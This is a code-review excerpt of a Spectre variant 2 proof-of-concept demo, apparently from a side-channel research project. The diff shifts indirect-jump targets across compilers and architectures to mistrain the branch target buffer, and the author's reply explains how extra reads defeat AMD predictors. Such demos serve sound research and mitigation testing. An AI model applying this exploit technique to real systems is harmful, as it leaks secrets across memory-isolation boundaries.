demos/spectre_v2.cc

```diff
@@ -0,0 +1,296 @@
+    sidechannel.FlushOracle();
+
+    // We pick a different offset every time so that it's guaranteed that the
+    // value of the in-bounds access is usually different from the secret value
+    // we want to leak via out-of-bounds speculative access.
+    size_t safe_offset = run % strlen(data);
+
+    // We are going to shift these pointers instruction-by-instruction (mov
+    // instruction in the case of real readers and nop instruction in the case
+    // of the dummy reader), so that we increase the amount of destination
+    // addresses;
+    char *first_ptr = reinterpret_cast<char *>(FirstActualRead);
+    char *second_ptr = reinterpret_cast<char *>(SecondActualRead);
+    char *dummy_ptr = reinterpret_cast<char *>(DummyRead);
+
+    for (int i = 0; i < 100; ++i) {
+      // Shift real readers to the next mov instruction and dummy reader to the
+      // next nop instruction to diversify destination addresses.
+#if SAFESIDE_X64 || SAFESIDE_IA32
+      // NOP has always one byte on X86/64.
+      dummy_ptr += 1;
+#  ifdef __clang__
+      // CLang uses movb to al as the blind fetch instruction and that has 2
+      // bytes.
+      first_ptr += 2;
+      second_ptr += 2;
+#  elif defined(__INTEL_COMPILER) && SAFESIDE_X64
+      // ICC generates cycles of length 8. First three are movs that have 2
+      // bytes (al, dl, cl), last five are movs that have 3 bytes (sil, r8b,
+      // r9b, r10b, r11b). On IA32 it behaves the same way as G++.
+      first_ptr += 2 + static_cast<bool>(i % 8 > 2);
+      second_ptr += 2 + static_cast<bool>(i % 8 > 2);
+#  elif SAFESIDE_GNUC || SAFESIDE_MSVC
+      // G++, MSVC and 32-bit ICC use movzbl to eax and that has 3 bytes.
+      first_ptr += 3;
+      second_ptr += 3;
+#  else
+#    error Unsupported compiler.
+#  endif
+#elif SAFESIDE_ARM64 || SAFESIDE_PPC
+      // ARM and PowerPC instructions have always 4 bytes.
+      dummy_ptr += 4;
+      first_ptr += 4;
+      second_ptr += 4;
+#else
+#  error Unsupported architecture.
+#endif
+
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+      void (*first_real_reader)(const void *) =
+          reinterpret_cast<void (*)(const void *)>(first_ptr);
+      void (*second_real_reader)(const void *) =
+          reinterpret_cast<void (*)(const void *)>(second_ptr);
+      *dummy_reader =
+          reinterpret_cast<void (*)(const void *)>(dummy_ptr);
+#elif SAFESIDE_IA32
+      void (SAFESIDE_FASTCALL *first_real_reader)(const void *) =
+          reinterpret_cast<void (SAFESIDE_FASTCALL *)(const void *)>(
+              first_ptr);
+      void (SAFESIDE_FASTCALL *second_real_reader)(const void *) =
+          reinterpret_cast<void (SAFESIDE_FASTCALL *)(const void *)>(
+              second_ptr);
+      *dummy_reader =
+          reinterpret_cast<void (SAFESIDE_FASTCALL *)(const void *)>(
+              dummy_ptr);
+#else
+#  error Unsupported architecture.
+#endif
+
+      // Inline 100 jumps to a real read from 100 different source addresses to
```

Comment:
Is it right that's what's happening here is that you're doing 100 real reads to valid addresses, then 100 reads to dummy addresses some of which will be misspeculated and leak data, and then 100 more real reads? Why do you have to do 100 jumps to real reads after the 100 jumps to dummy reads? Maybe explain that here instead of where I commented earlier?

Reply:
The two batches of real reads are just for confusing the BTB for the next run, because the dummy targets are between them (so that they can misjump both to lower addresses in the FirstRealRead or to higher addresses in the SecondRealRead). Especially the AMD perceptrons are quite resilient against jump mispredictions (concretely against creating collisions), so the scenario must be sufficiently complicated and make speculation traps on speculative behavior that is optimized for classical jump patterns.